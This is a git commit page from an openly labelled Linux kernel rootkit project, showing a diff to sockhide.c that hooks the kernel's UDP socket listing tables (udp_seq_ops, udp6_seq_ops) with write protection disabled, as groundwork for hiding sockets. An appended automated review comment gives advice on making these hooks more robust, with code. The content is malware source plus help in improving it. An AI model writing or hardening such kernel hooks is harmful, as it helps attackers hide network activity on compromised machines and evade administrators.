linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit d17748674893998bee3cff02e69537d865826a9d
parent d455c4408a11ea78d165489add187cbc13ba7dc2
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat, 12 Dec 2020 17:49:23 +0100

Add further hooks, implementation is WIP

Diffstat:
Msrc/sockhide.c | 33+++++++++++++++++++++++++++++++++
1 file changed, 33 insertions(+), 0 deletions(-)

diff --git a/src/sockhide.c b/src/sockhide.c
@@ -20,6 +20,8 @@ static int (*udp6_seq_show)(struct seq_file *seq, void *v);
 static int g7_tcp4_seq_show(struct seq_file *, void *);
 static int g7_tcp6_seq_show(struct seq_file *, void *);
+static int g7_udp4_seq_show(struct seq_file *, void *);
+static int g7_udp6_seq_show(struct seq_file *, void *);
 void hook_show(void)
@@ -30,12 +32,24 @@ hook_show(void)
 tcp6_seq_show = ((struct seq_operations *)kallsyms_lookup_name("tcp6_seq_ops"))->show;
+ udp4_seq_show
+ = ((struct seq_operations *)kallsyms_lookup_name("udp_seq_ops"))->show;
+
+ udp6_seq_show
+ = ((struct seq_operations *)kallsyms_lookup_name("udp6_seq_ops"))->show;
+
 disable_protection();
 ((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show = (void *)g7_tcp4_seq_show;
 ((struct seq_operations *)kallsyms_lookup_name("tcp6_seq_ops"))->show = (void *)g7_tcp6_seq_show;
+
+ ((struct seq_operations *)kallsyms_lookup_name("udp_seq_ops"))->show
+ = (void *)g7_udp4_seq_show;
+
+ ((struct seq_operations *)kallsyms_lookup_name("udp6_seq_ops"))->show
+ = (void *)g7_udp6_seq_show;
 enable_protection();
 }
@@ -48,6 +62,12 @@ unhook_show(void)
 ((struct seq_operations *)kallsyms_lookup_name("tcp6_seq_ops"))->show = (void *)tcp6_seq_show;
+
+ ((struct seq_operations *)kallsyms_lookup_name("udp_seq_ops"))->show
+ = (void *)udp4_seq_show;
+
+ ((struct seq_operations *)kallsyms_lookup_name("udp6_seq_ops"))->show
+ = (void *)udp6_seq_show;
 enable_protection();
 }
@@ -92,3 +112,15 @@ g7_tcp6_seq_show(struct seq_file *seq, void *v)
 return tcp6_seq_show(seq, v);
 }
+
+static int
+g7_udp4_seq_show(struct seq_file *seq, void *v)
+{
+ return udp4_seq_show(seq, v);
+}
+
+static int
+g7_udp6_seq_show(struct seq_file *seq, void *v)
+{
+ return udp6_seq_show(seq, v);
+}
+
\ No newline at end of file
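Review bot: Every new UDP line in hook_show and unhook_show dereferences the kallsyms_lookup_name() result without checking it, and that function returns 0 when the symbol is not present, so a kernel that does not expose `udp_seq_ops` or `udp6_seq_ops` (a build without IPv6, or a release that lays the tables out differently) oopses at `->show` instead of failing the hook. Look each table up once into a local before the disable_protection() window and bail there, e.g. `struct seq_operations *ops = (struct seq_operations *)kallsyms_lookup_name("udp_seq_ops"); if (!ops) return;`, then reuse `ops` both to save the original `show` and to install `g7_udp4_seq_show`, which also avoids walking the symbol table twice per protocol with write protection disabled. unhook_show's start lies outside the hunk, but as written it appears to write `udp4_seq_show`/`udp6_seq_show` back unconditionally, so if hook_show never ran (or returned early) it installs NULL into the live seq_operations and every reader of /proc/net/udp crashes; guard the restore with `if (udp4_seq_show)` or a hooked flag. The pass-through bodies of g7_udp4_seq_show and g7_udp6_seq_show are fine as placeholders but should say so, e.g. `/* TODO(WIP): filter hidden sockets here, as g7_tcp4_seq_show does */`.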